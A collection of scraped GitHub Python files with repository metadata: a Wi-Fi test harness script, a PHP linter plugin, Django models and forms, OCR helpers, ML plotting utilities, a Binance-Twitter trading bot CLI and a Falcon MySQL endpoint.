LogMsg("Node1 = %s" %node.nodeName)
L = node.getElementsByTagName(tag)
for node2 in L:
LogMsg("----Node2 = %s" %node2.nodeName)
for node4 in node2.childNodes:
if node4.nodeName != "#text":
LogMsg("------------Node4. = %s %s" % (node4.nodeName, node4.firstChild.nodeValue))
VarList.setdefault(node4.nodeName, node4.firstChild.nodeValue)
result = 1
LogMsg("\n|\n|\n| Found Throughput values -%s-" % (result))
return result
def createDownloadLog():
downloadLogs = open("DownloadLogs.bat", 'w')
downloadLogs.write("@@echo off \n")
downloadLogs.write("FOR /F %%T in ('findstr \".\" p') do (\n set LogPath=%%T\n )\n")
#DUT Log
#Sniffer Trace
LogMsg("============================= Init File -%s- Sniffer Flag-%s- Sniffer IP -%s--" % (uccPath+InitFile, ReadMapFile(uccPath+InitFile, "sniffer_enable", "!"), ReadMapFile(uccPath+InitFile, "wfa_console_tg", "!")))
if ReadMapFile(uccPath+InitFile, "sniffer_enable", "!") == "1":
downloadLogs.write("wget -q -t 1 -T 4 -P %sLogPath%s\Sniffer --ftp-user=wifiuser --ftp-password=asdlinux ftp://%s/sniffer_trace*\n"%("%", "%", ReadMapFile(uccPath+InitFile, "wfa_sniffer", "!").split(',')[0].split('=')[1]))
downloadLogs.close()
| UTF-8 | Python | false | false | 70,040 | py | 13 | InitTestEnv.py | 7 | 0.558024 | 0.543075 | 0 | 1,827 | 36.33607 | 255 |
amdel2020/Algorithms | 17,377,437,682,294 | e0a877fb855fba1b9242d734e9c0f2fa89e1c0e3 | da7de5e15ca6b8076649c4197a6fdbbaf19e020f | /16.4.py | d2f4fa51598b8f6b29fdb663c61b4f20b09547bc | []
| no_license | https://github.com/amdel2020/Algorithms | 36ad53bc5d5ece95e368438634531d325cc37c05 | 43358c931836a807e1d5383faa6412bc11015fda | refs/heads/master | 2020-03-09T03:05:16.545207 | 2019-10-28T14:46:54 | 2019-10-28T14:46:54 | 128,556,539 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def check_status(grid):
n = len(grid)
# from 0, 0 to 0, n-1
# from 1,0 to 1, n-1
# ...
# from n-1, 0 to 1, n-1
# similarly check column wise
# also check diagonal
# at any point if all are same, then win,
# if end reached, then lose
pass
| UTF-8 | Python | false | false | 278 | py | 143 | 16.4.py | 105 | 0.553957 | 0.510791 | 0 | 11 | 24.272727 | 45 |
tamascsaba/My-Sublime-Backup | 9,483,287,806,282 | 088952653ef080c161bf63900521078aa8049289 | 84e769b87b5c80881f4ea805eac51cd4dea24d1d | /SublimeLinter-php/linter.py | 3902921152560854c9a7b165231699d35bb10085 | [
"MIT"
]
| permissive | https://github.com/tamascsaba/My-Sublime-Backup | 6ccef00bc4464c583231c2b14f5a8fc5dba42cfc | db9e0a7acd043a482e600846cc337c363bc24cb8 | refs/heads/master | 2021-01-24T06:36:56.302803 | 2014-04-17T09:31:11 | 2014-04-17T09:31:11 | 18,873,350 | 3 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# linter.py
# Linter for SublimeLinter3, a code checking framework for Sublime Text 3
#
# Written by Ryan Hileman, Aparajita Fishman and Anthony Pidden
# Copyright (c) 2013 Ryan Hileman, Aparajita Fishman and Anthony Pidden
#
# License: MIT
#
"""This module exports the PHP plugin class."""
from SublimeLinter.lint import Linter, util
class PHP(Linter):
"""Provides an interface to php -l."""
syntax = ('php', 'html')
cmd = 'php -l -n -d display_errors=On -d log_errors=Off'
regex = (
r'^(?:Parse|Fatal) (?P<error>error):(\s*(?P<type>parse|syntax) error,?)?\s*'
r'(?P<message>(?:unexpected \'(?P<near>[^\']+)\')?.*) in - on line (?P<line>\d+)'
)
error_stream = util.STREAM_STDOUT
def split_match(self, match):
"""Return the components of the error."""
match, line, col, error, warning, message, near = super().split_match(match)
# message might be empty, we have to supply a value
if match and match.group('type') == 'parse' and not message:
message = 'parse error'
return match, line, col, error, warning, message, near
| UTF-8 | Python | false | false | 1,128 | py | 26 | linter.py | 6 | 0.626773 | 0.621454 | 0 | 36 | 30.333333 | 89 |
Boorneeswari/GUVI_PROGRAMS | 15,582,141,367,507 | a3edb477b1db7082c4043e366a4b88104923367e | ed84a727dfcde9481668d0317ca3b2c80e58ad0f | /set8vow.py | 63d7807658faae3e3d7b9fe1140c06ad720d9a35 | []
| no_license | https://github.com/Boorneeswari/GUVI_PROGRAMS | 2458c47da89a3cf1450b5b20eea7e34fba7dd051 | 0f1648f95064043bba93195062954a0afe67ed66 | refs/heads/master | 2020-03-22T21:15:50.236733 | 2018-10-03T13:05:47 | 2018-10-03T13:05:47 | 140,672,212 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | strr=input()
vow=['a','e','i','o','u','A','E','I','O','U']
for i in range(len(strr)):
if strr[i] in vow:
print("yes")
break
else:
print("no")
| UTF-8 | Python | false | false | 166 | py | 58 | set8vow.py | 58 | 0.457831 | 0.457831 | 0 | 8 | 19.75 | 45 |
TsarSPb/Haustiere | 17,179,869,207,645 | ce3673bef97722cc0ef9f256a56c489580e1363d | 08119ddcc8b273f0dc86a351f2c02d6d03cf8537 | /CMAPSS/support_func.py | b5a29951e12b8f19bd37f79988f6ebde6cc4811e | []
| no_license | https://github.com/TsarSPb/Haustiere | facd64fc763024c08ffb9c480082cb4d790d7566 | 8a8b0f4d791d7e0da5f12560e4c475c6c18e34c0 | refs/heads/master | 2020-08-27T09:07:36.685143 | 2019-10-30T16:41:38 | 2019-10-30T16:41:38 | 217,311,786 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import matplotlib.pyplot as plt
def plot_results(results_list,partno):
models = [x[0] for x in results_list]
if partno==1:
cv_score_train_mean = [x[1][0] for x in results_list]
cv_score_val_mean = [x[1][1] for x in results_list]
cv_score_test_mean = [x[1][2] for x in results_list]
# Getting accuracies from conf matrices
pct_score_train_mean = [np.round(np.trace(x[3][0])/np.sum(x[3][0])*100,2) for x in results_list]
pct_score_val_mean = [np.round(np.trace(x[3][1])/np.sum(x[3][1])*100,2) for x in results_list]
pct_score_test_mean = [np.round(np.trace(x[3][2])/np.sum(x[3][2])*100,2) for x in results_list]
overestimated_train = [np.triu(x[3][0],k=1).sum() for x in results_list]
overestimated_val = [np.triu(x[3][1],k=1).sum() for x in results_list]
overestimated_test = [np.triu(x[3][2],k=1).sum() for x in results_list]
underestimated_train = [np.tril(x[3][0],k=-1).sum() for x in results_list]
underestimated_val = [np.tril(x[3][1],k=-1).sum() for x in results_list]
underestimated_test = [np.tril(x[3][2],k=-1).sum() for x in results_list]
plot_rows = 2
plot_cols = 2
plt.figure(figsize=(15,5))
plt.subplot(plot_rows,plot_cols,1)
plt.title('CV scores')
plt.plot(models,cv_score_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,cv_score_val_mean,label='val')
plt.plot(models,cv_score_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,2)
plt.title('% acc')
plt.plot(models,pct_score_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,pct_score_val_mean,label='val')
plt.plot(models,pct_score_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,3)
plt.title('Overestimated TTF')
plt.plot(models,overestimated_train,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,overestimated_val,label='val')
plt.plot(models,overestimated_test,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,4)
plt.title('Underestimated TTF')
plt.plot(models,underestimated_train,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,underestimated_val,label='val')
plt.plot(models,underestimated_test,label='test')
plt.legend()
return models, overestimated_train, overestimated_val, overestimated_test, underestimated_train, underestimated_val, underestimated_test, pct_score_train_mean, pct_score_val_mean, pct_score_test_mean
if partno==2:
f1_micro_train_mean = [x[4][0][0] for x in results_list]
f1_micro_val_mean = [x[4][1][0] for x in results_list]
f1_micro_test_mean = [x[4][2][0] for x in results_list]
f1_macro_train_mean = [x[4][0][1] for x in results_list]
f1_macro_val_mean = [x[4][1][1] for x in results_list]
f1_macro_test_mean = [x[4][2][1] for x in results_list]
f1_weighted_train_mean = [x[4][0][2] for x in results_list]
f1_weighted_val_mean = [x[4][1][2] for x in results_list]
f1_weighted_test_mean = [x[4][2][2] for x in results_list]
accuracy_train_mean = [x[4][0][3] for x in results_list]
accuracy_val_mean = [x[4][1][3] for x in results_list]
accuracy_test_mean = [x[4][2][3] for x in results_list]
plot_rows = 2
plot_cols = 2
plt.figure(figsize=(15,5))
plt.subplot(plot_rows,plot_cols,1)
plt.title('f1_micro')
plt.plot(models,f1_micro_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,f1_micro_val_mean,label='val')
plt.plot(models,f1_micro_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,2)
plt.title('f1_macro')
plt.plot(models,f1_macro_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,f1_macro_val_mean,label='val')
plt.plot(models,f1_macro_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,3)
plt.title('f1_weighted')
plt.plot(models,f1_weighted_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,f1_weighted_val_mean,label='val')
plt.plot(models,f1_weighted_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,4)
plt.title('accuracy')
plt.plot(models,accuracy_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,accuracy_val_mean,label='val')
plt.plot(models,accuracy_test_mean,label='test')
plt.legend()
if partno==3:
precision_micro_train_mean = [x[4][0][4] for x in results_list]
precision_micro_val_mean = [x[4][1][4] for x in results_list]
precision_micro_test_mean = [x[4][2][4] for x in results_list]
precision_macro_train_mean = [x[4][0][5] for x in results_list]
precision_macro_val_mean = [x[4][1][5] for x in results_list]
precision_macro_test_mean = [x[4][2][5] for x in results_list]
precision_weighted_train_mean = [x[4][0][6] for x in results_list]
precision_weighted_val_mean = [x[4][1][6] for x in results_list]
precision_weighted_test_mean = [x[4][2][6] for x in results_list]
recall_micro_train_mean = [x[4][0][7] for x in results_list]
recall_micro_val_mean = [x[4][1][7] for x in results_list]
recall_micro_test_mean = [x[4][2][7] for x in results_list]
recall_macro_train_mean = [x[4][0][8] for x in results_list]
recall_macro_val_mean = [x[4][1][8] for x in results_list]
recall_macro_test_mean = [x[4][2][8] for x in results_list]
recall_weighted_train_mean = [x[4][0][9] for x in results_list]
recall_weighted_val_mean = [x[4][1][9] for x in results_list]
recall_weighted_test_mean = [x[4][2][9] for x in results_list]
plot_rows = 2
plot_cols = 3
plt.figure(figsize=(15,5))
plt.subplot(plot_rows,plot_cols,1)
plt.title('precision_micro')
plt.plot(models,precision_micro_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,precision_micro_val_mean,label='val')
plt.plot(models,precision_micro_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,2)
plt.title('precision_macro')
plt.plot(models,precision_macro_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,precision_macro_val_mean,label='val')
plt.plot(models,precision_macro_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,3)
plt.title('precision_weighted')
plt.plot(models,precision_weighted_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,precision_weighted_val_mean,label='val')
plt.plot(models,precision_weighted_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,4)
plt.title('recall_micro')
plt.plot(models,recall_micro_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,recall_micro_val_mean,label='val')
plt.plot(models,recall_micro_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,5)
plt.title('recall_macro')
plt.plot(models,recall_macro_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,recall_macro_val_mean,label='val')
plt.plot(models,recall_macro_test_mean,label='test')
plt.legend()
plt.subplot(plot_rows,plot_cols,6)
plt.title('recall_weighted')
plt.plot(models,recall_weighted_train_mean,label='train',linewidth=0.5,linestyle='dashed')
plt.plot(models,recall_weighted_val_mean,label='val')
plt.plot(models,recall_weighted_test_mean,label='test')
plt.legend()
| UTF-8 | Python | false | false | 7,237 | py | 5 | support_func.py | 1 | 0.699599 | 0.6692 | 0 | 145 | 48.903448 | 201 |
Aurora11111/chineseocr | 9,448,928,072,159 | 5523f721a4e89b434db4a55dc3a2da202a5f0afd | ccb960e65bc5f1f4b82e5d7b7e25a0c07ca7162d | /detector/other.py | 3cc7173f78b4bab6b5419d06915ca09dfd516f9d | [
"MIT"
]
| permissive | https://github.com/Aurora11111/chineseocr | f9fcf071bda94c3bfbca1314096dcd46a8972c8c | 43ed6255aee6fad6ad2c66854681b26e7676defa | refs/heads/master | 2020-04-06T13:05:20.372898 | 2019-05-20T10:26:06 | 2019-05-20T10:26:06 | 157,483,488 | 2 | 0 | MIT | true | 2018-11-14T03:15:06 | 2018-11-14T03:15:05 | 2018-11-13T16:53:04 | 2018-11-13T16:53:02 | 8,090 | 0 | 0 | 0 | null | false | null | import cv2
import numpy as np
def prepare_img(im, mean):
"""
transform img into caffe's input img.
"""
im_data=np.transpose(im-mean, (2, 0, 1))
return im_data
def get_boxes(im, bboxes):
"""
boxes: bounding boxes
"""
text_recs=np.zeros((len(bboxes), 8), np.int)
im=im.copy()
index = 0
for box in bboxes:
b1 = box[6] - box[7] / 2
b2 = box[6] + box[7] / 2
x1 = box[0]
y1 = box[5] * box[0] + b1
x2 = box[2]
y2 = box[5] * box[2] + b1
x3 = box[0]
y3 = box[5] * box[0] + b2
x4 = box[2]
y4 = box[5] * box[2] + b2
disX = x2 - x1
disY = y2 - y1
width = np.sqrt(disX*disX + disY*disY)
fTmp0 = y3 - y1
fTmp1 = fTmp0 * disY / width
x = np.fabs(fTmp1*disX / width)
y = np.fabs(fTmp1*disY / width)
if box[5] < 0:
x1 -= x
y1 += y
x4 += x
y4 -= y
else:
x2 += x
y2 += y
x3 -= x
y3 -= y
text_recs[index, 0] = x1
text_recs[index, 1] = y1
text_recs[index, 2] = x2
text_recs[index, 3] = y2
text_recs[index, 4] = x3
text_recs[index, 5] = y3
text_recs[index, 6] = x4
text_recs[index, 7] = y4
index = index + 1
return text_recs,im
def threshold(coords, min_, max_):
return np.maximum(np.minimum(coords, max_), min_)
def clip_boxes(boxes, im_shape):
"""
Clip boxes to image boundaries.
"""
boxes[:, 0::2]=threshold(boxes[:, 0::2], 0, im_shape[1]-1)
boxes[:, 1::2]=threshold(boxes[:, 1::2], 0, im_shape[0]-1)
return boxes
def normalize(data):
if data.shape[0]==0:
return data
max_=data.max()
min_=data.min()
return (data-min_)/(max_-min_) if max_-min_!=0 else data-min_
def resize_im(im, scale, max_scale=None):
f=float(scale)/min(im.shape[0], im.shape[1])
if max_scale!=None and f*max(im.shape[0], im.shape[1])>max_scale:
f=float(max_scale)/max(im.shape[0], im.shape[1])
return cv2.resize(im, (0, 0), fx=f, fy=f), f
#return cv2.resize(im, (0, 0), fx=1.2, fy=1.2), f
| UTF-8 | Python | false | false | 2,222 | py | 19 | other.py | 13 | 0.486049 | 0.436994 | 0 | 90 | 23.633333 | 69 |
NoisyPillow/twitter-binance-bridge-bot | 506,806,149,986 | 379a86aabbae1d0b3836d339288bf85c3c642f5c | f5671dc87867e718b654cdebc69f4c9aaefec50a | /UiCore.py | 62893d20994026bcd27df16d8f511839da130491 | [
"LicenseRef-scancode-warranty-disclaimer"
]
| no_license | https://github.com/NoisyPillow/twitter-binance-bridge-bot | 519f2bee78fc3f6ef79971600447b2a8b10e4ba1 | 2079ba5593769c47960108f62590c6db39d0cea3 | refs/heads/master | 2023-05-04T21:07:32.422112 | 2021-05-12T09:55:16 | 2021-05-12T09:55:16 | 364,655,277 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from PyInquirer import Separator, prompt
from BinanceTwitterBridge import BinanceTwitterBridge
from ConfigManager import Config
import colorama
from colorama import Fore, Style
from art import tprint
import json
class CLI:
def __init__(self):
colorama.init()
self.config = Config()
self.bridge = BinanceTwitterBridge()
self.binance_client = self.bridge.binance_client
print('\n')
tprint("T-B Bridge", font="random")
print("----------------------------------------------------------")
print(f"Current {self.config.ASSET} value: ")
print(
" \u001b[33m ❯ " +
f"{self.binance_client.get_price(self.config.ASSET + self.config.BASE_ASSET)} {self.config.BASE_ASSET}\033[0m"
)
print(f"Current {self.config.BASE_ASSET} balance: ")
print(
" \u001b[33m ❯ " +
f"{self.binance_client.get_asset_blance(self.config.BASE_ASSET)} {self.config.BASE_ASSET}\033[0m"
)
print(f"Gain summary: ")
print(" \u001b[33m ❯ " +
f"{self.get_gain_summary()} {self.config.BASE_ASSET}\033[0m")
print("----------------------------------------------------------")
self.main_menu()
def get_gain_summary(self):
bought = 0.0
sold = 0.0
with open('trades.log', 'r') as log_file:
trades = log_file.readlines()
for trade in trades:
details = json.loads(trade.split(' ', 3)[3])
if 'BUY' in trade:
bought += float(details['price']) * float(
details['qty']) - float(details['commission'])
elif 'SELL' in trade:
sold += float(details['price']) * float(
details['qty']) - float(details['commission'])
return sold - bought
def main_menu(self):
main_menu_prompt = {
'type': 'list',
'name': 'main-menu',
'message': 'Twitter-Binance bridge bot',
'choices': ['Start bot', 'Exit',
Separator(), 'Settings']
}
answer = prompt(main_menu_prompt)['main-menu']
if answer == 'Start bot':
self.bridge.start()
elif answer == 'Exit':
exit()
elif answer == 'Settings':
self.settings_menu()
def settings_menu(self):
settings_menu_prompt = {
'type':
'list',
'name':
'settings_menu',
'message':
'Settings',
'choices': [
'Set ASSET', 'Set BASE_ASSET', 'Set BASE_ASSET_QUANTITY',
'Set INTERVAL',
Separator(), 'Return'
]
}
answer = prompt(settings_menu_prompt)['settings_menu']
if answer == 'Set ASSET':
set_asset_prompt = {
'type':
'input',
'name':
'asset_input',
'message':
f'What asset do you want to buy ? (currently {self.config.get_asset()})'
}
asset = prompt(set_asset_prompt)['asset_input']
self.config.update_asset(asset)
self.bridge.reload_config()
self.settings_menu()
elif answer == 'Set BASE_ASSET':
set_base_asset_prompt = {
'type':
'input',
'name':
'base_asset_input',
'message':
f'What base asset do you want to buy with ? (currently {self.config.get_base_asset()})'
}
base_asset = prompt(set_base_asset_prompt)['base_asset_input']
self.config.update_base_asset(base_asset)
self.bridge.reload_config()
self.settings_menu()
elif answer == 'Set BASE_ASSET_QUANTITY':
set_base_asset_quantity_prompt = {
'type':
'input',
'name':
'base_asset_quantity_input',
'message':
f'What base asset quantity do you want to use ? (currently {self.config.get_base_asset_quantity()} {self.config.get_base_asset()})'
}
base_asset_quantity = prompt(
set_base_asset_quantity_prompt)['base_asset_quantity_input']
self.config.update_base_asset_quantity(base_asset_quantity)
self.bridge.reload_config()
self.settings_menu()
elif answer == 'Set INTERVAL':
interval_prompt = {
'type':
'input',
'name':
'interval_input',
'message':
f'How many time between buy and sell ? (currently {self.config.get_interval()} seconds)'
}
interval = prompt(interval_prompt)['interval_input']
self.config.update_interval(interval)
self.bridge.reload_config()
self.settings_menu()
elif answer == 'Return':
self.main_menu()
| UTF-8 | Python | false | false | 5,116 | py | 9 | UiCore.py | 5 | 0.486888 | 0.480431 | 0 | 137 | 36.29927 | 147 |
jesperswillem/protwis | 14,972,256,024,126 | 406470ff4b50d7526ebbc620a810cedb8e36744c | 80fe2166509c215a02081b5823035fcc0b7eac31 | /contactnetwork/models.py | fcb3440e5734c0e3d3f764fdb85a17111ae8d7b0 | [
"Apache-2.0"
]
| permissive | https://github.com/jesperswillem/protwis | e3c6b1fae456272d4849d6b79ff7ed5948b1e787 | a36cd60fe9724d61b2c78c4d16f9d3697543b8aa | refs/heads/master | 2021-01-18T03:05:47.743570 | 2019-03-22T14:17:16 | 2019-06-06T10:11:35 | 52,868,185 | 0 | 0 | Apache-2.0 | true | 2019-06-25T11:12:37 | 2016-03-01T10:23:31 | 2019-06-24T10:07:00 | 2019-06-25T11:11:55 | 32,910 | 0 | 0 | 1 | Python | false | false | from structure.models import Structure
from django.db import models
class InteractingResiduePair(models.Model):
referenced_structure = models.ForeignKey('structure.Structure', on_delete=models.CASCADE)
res1 = models.ForeignKey('residue.Residue', related_name='residue1', on_delete=models.CASCADE)
res2 = models.ForeignKey('residue.Residue', related_name='residue2', on_delete=models.CASCADE)
@classmethod
def truncate(cls):
from django.db import connection
with connection.cursor() as cursor:
cursor.execute('TRUNCATE TABLE "{0}" RESTART IDENTITY CASCADE'.format(cls._meta.db_table))
class Meta():
db_table = 'interacting_residue_pair'
class Interaction(models.Model):
interacting_pair = models.ForeignKey('contactnetwork.InteractingResiduePair', on_delete=models.CASCADE)
interaction_type = models.CharField(max_length=100)
specific_type = models.CharField(max_length=100, null=True)
# interaction_level -> 0 - normal definition, 1 - loosened definition
interaction_level = models.IntegerField(null=False, default=0)
atomname_residue1 = models.CharField(max_length=10, null=True)
atomname_residue2 = models.CharField(max_length=10, null=True)
@classmethod
def truncate(cls):
from django.db import connection
with connection.cursor() as cursor:
cursor.execute('TRUNCATE TABLE "{0}" RESTART IDENTITY CASCADE'.format(cls._meta.db_table))
class Meta():
db_table = 'interaction'
class Distance(models.Model):
structure = models.ForeignKey('structure.Structure', related_name='distances', on_delete=models.CASCADE, null=True)
res1 = models.ForeignKey('residue.Residue', related_name='distance_residue1', on_delete=models.CASCADE, null=True)
res2 = models.ForeignKey('residue.Residue', related_name='distance_residue2', on_delete=models.CASCADE, null=True)
gn1 = models.CharField(max_length=100, null=True)
gn2 = models.CharField(max_length=100, null=True)
gns_pair = models.CharField(db_index=True, max_length=100, null=True)
distance = models.IntegerField()
@classmethod
def truncate(cls):
from django.db import connection
with connection.cursor() as cursor:
cursor.execute('TRUNCATE TABLE "{0}" RESTART IDENTITY CASCADE'.format(cls._meta.db_table))
class Meta():
db_table = 'distance'
| UTF-8 | Python | false | false | 2,408 | py | 11 | models.py | 8 | 0.712209 | 0.696844 | 0 | 57 | 41.245614 | 119 |
james-chang727/Python_practice | 16,793,322,156,428 | 58f07b963f4b59cab29128c023ae15b762d90b98 | e90ea647cb2b632842f50126dd20c87a990d961f | /003 conditions exercise/Q2.py | c8ea4558fd59151f9c36c082291d3640cc44b5dd | []
| no_license | https://github.com/james-chang727/Python_practice | 9cad6e7c83cafffc4bc3005c401bde91f3dd29bb | adcd8ff18c2aa6ee685c79b13cdc08623e91d1bb | refs/heads/master | 2022-11-06T13:28:13.398066 | 2020-06-23T16:30:51 | 2020-06-23T16:30:51 | 262,010,137 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | age = int(input("Enter your age:"))
crim = str(input("Do you have a criminal record (y/n):"))
age_jury = 18 <= age <= 65
if age_jury and crim == "n":
print("You are required to do jury service.")
elif not age_jury or crim == "y":
print("You are excluded from jury service.")
elif crim != "y" or "n":
print("Incorrect input.")
| UTF-8 | Python | false | false | 339 | py | 35 | Q2.py | 34 | 0.625369 | 0.613569 | 0 | 10 | 32.9 | 57 |
Major101/Attendance | 4,355,096,844,409 | b362accf0fb469de26f21d2de8959b842b5d6146 | 3b872b7a42b207b9f402d63d9535cec2f67eb8f4 | /Attendance/attendance_tracker/migrations/0008_auto_20191127_1200.py | 46ff10899971fd6f8d4aab71e535e71d34ecf8e6 | []
| no_license | https://github.com/Major101/Attendance | 56069d635cee4200f73befccef659ae5aa54c174 | 1515ef3e9a60d5560b30f5b78f256104f4314e07 | refs/heads/master | 2020-09-21T00:58:43.752105 | 2019-12-05T06:47:07 | 2019-12-05T06:47:07 | 224,634,874 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 2.2.7 on 2019-11-27 12:00
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('attendance_tracker', '0007_employee_time'),
]
operations = [
migrations.RenameField(
model_name='employee',
old_name='time',
new_name='arrived_time',
),
]
| UTF-8 | Python | false | false | 375 | py | 12 | 0008_auto_20191127_1200.py | 9 | 0.578667 | 0.528 | 0 | 18 | 19.833333 | 53 |
veckerid/django-xmpp | 18,004,502,939,593 | 64dc306352ca8b3e1cc7123546fbca525e6e1674 | e58249581c88d7c77e18d9345d3bc69b6469b772 | /forms.py | 1c1e28a60f5bcaf3b604d356c4d1b6c801f55e6b | []
| no_license | https://github.com/veckerid/django-xmpp | df8b8bb708dc333cd0746cdc47aa8a697211522b | 3af0db45f30218d17d56975b5e868bdb09743b28 | refs/heads/master | 2020-05-19T23:13:58.799248 | 2009-08-21T19:54:56 | 2009-08-21T19:54:56 | 34,379,252 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (c) 2009 Marcello Bontempo Salgueiro and contributors
#
# This file is part of Django XMPP.
#
# Django XMPP is free software under terms of the GNU Lesser
# General Public License version 3 (LGPLv3) as published by the Free
# Software Foundation. See the file README for copying conditions.
#
from django import forms
class loginFORM(forms.Form):
jabber_id = forms.CharField(max_length=300)
jabber_pwd = forms.CharField(max_length=20, widget=forms.PasswordInput)
class sendFORM(forms.Form):
user = forms.CharField(max_length=300)
msg = forms.CharField(widget=forms.Textarea())
class authJIDFORM(forms.Form):
jid_auth = forms.CharField(max_length=300)
STATUS_C = (
('Connected','Connected'),
('Alway','Alway'),
('Busy','Busy'),
)
class changeSTATUS(forms.Form):
status = forms.ChoiceField(widget=forms.Select(),choices=STATUS_C)
| UTF-8 | Python | false | false | 889 | py | 12 | forms.py | 5 | 0.731159 | 0.710911 | 0 | 32 | 26.78125 | 72 |
shen-huang/selfteaching-python-camp | 7,937,099,610,551 | 16274687f2c434de16e8c0712ae10a99f8a02cb2 | 9dba277eeb0d5e9d2ac75e2e17ab5b5eda100612 | /exercises/1901010112/1001S02E05_array.py | 58c6311ddf0b4346c7b3b4c8b5d04a8f94c9f2df | []
| no_license | https://github.com/shen-huang/selfteaching-python-camp | e8410bfc06eca24ee2866c5d890fd063e9d4be89 | 459f90c9f09bd3a3df9e776fc64dfd64ac65f976 | refs/heads/master | 2022-05-02T05:39:08.932008 | 2022-03-17T07:56:30 | 2022-03-17T07:56:30 | 201,287,222 | 9 | 6 | null | true | 2019-08-08T15:34:26 | 2019-08-08T15:34:25 | 2019-08-08T14:44:30 | 2019-08-08T15:18:39 | 45,209 | 0 | 0 | 0 | null | false | false | #将数组 [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] 翻转
a = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
a.reverse()#reverse是用来反转列表
print('列表翻转 ==>',a)
#翻转后的数组拼接成字符串
b = "".join([str(i) for i in a])#使用join方法将数组中的元素以""的连接生成新的字符串str(i)
print("输出字符串 ==>",b)
s=b
c=s[2:8]
print("切片取出3-8字符==>",c)
d=int(c[::-1])#::→字符串的开始和结尾; -1→进行翻转的动作; int→ 结果转换为int型
print('获得的字符串进行翻转并转化为int型',d)
print('转换成二进制==>',bin(d))
print('转换成八进制==>',oct(d))
print('转换成十六进制==>',hex(d))
| UTF-8 | Python | false | false | 671 | py | 2,882 | 1001S02E05_array.py | 2,421 | 0.590164 | 0.529274 | 0 | 15 | 27.466667 | 67 |
xiaoyaochen/ACshare | 14,010,183,343,854 | 455663f2fe028301c3d9d92c53a2aa9a0a685956 | 61267e7bb146e67d7ce5b81ef8c6fb32cdb1088e | /apps/forums/migrations/0003_auto_20190409_2323.py | 188421fffb24c6c2a66cff8ac9ab1a98616d354e | []
| no_license | https://github.com/xiaoyaochen/ACshare | 8f7e294724d90925f9fb80799c9fbd3680c01057 | 482985231e0e6d8632c8504a30f994ba246a060a | refs/heads/master | 2020-05-07T11:57:43.663344 | 2019-04-20T14:55:55 | 2019-04-20T14:55:55 | 180,483,088 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Generated by Django 2.0 on 2019-04-09 23:23
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('forums', '0002_auto_20190408_2007'),
]
operations = [
migrations.RemoveField(
model_name='forumscomment',
name='forums',
),
migrations.RemoveField(
model_name='forumscomment',
name='parent_conment',
),
migrations.RemoveField(
model_name='forumscomment',
name='user',
),
migrations.AlterUniqueTogether(
name='forumsupdown',
unique_together=set(),
),
migrations.RemoveField(
model_name='forumsupdown',
name='forums',
),
migrations.RemoveField(
model_name='forumsupdown',
name='user',
),
migrations.RenameField(
model_name='forums',
old_name='comment_count',
new_name='view_count',
),
migrations.DeleteModel(
name='ForumsComment',
),
migrations.DeleteModel(
name='ForumsUpDown',
),
]
| UTF-8 | Python | false | false | 1,195 | py | 48 | 0003_auto_20190409_2323.py | 30 | 0.515481 | 0.490377 | 0 | 48 | 23.895833 | 46 |
AvishaySebban/Zakuski | 13,142,599,945,349 | 9ef1180d585551d3668f37976d56a637771027f6 | cd908f412af49aa848650707d424db7c3a605661 | /resources.py | c0c3aeb7444a5c72d6c595d2ec5f089f674a09c7 | []
| no_license | https://github.com/AvishaySebban/Zakuski | 70949947733048366074a8eb2f012f520c23d983 | 3daf4f5994d108b6db3eba710b9d1cc88d40c67d | refs/heads/master | 2021-01-19T19:32:06.942766 | 2017-05-23T06:48:43 | 2017-05-23T06:48:43 | 88,351,987 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import falcon
import MySQLdb
import json
import db_conf
class GetUser:
def on_get(self, req, resp):
try:
db = MySQLdb.connect(**db_conf.dbConfig)
#use dictionary cursor
cursor = db.cursor(MySQLdb.cursors.DictCursor)
q = ("select * from USER")
cursor.execute(q)
rows = cursor.fetchall()
#init the output object
output = {'User': []}
for row in rows:
data = {
"user_id": row['user_id'],
"UserName": row['UserName'],
"Password": row['Password'],
"Email": row['Email']
}
output['User'].append(data)
resp.status = falcon.HTTP_200
resp.body = json.dumps(output, encoding='utf-8')
cursor.close()
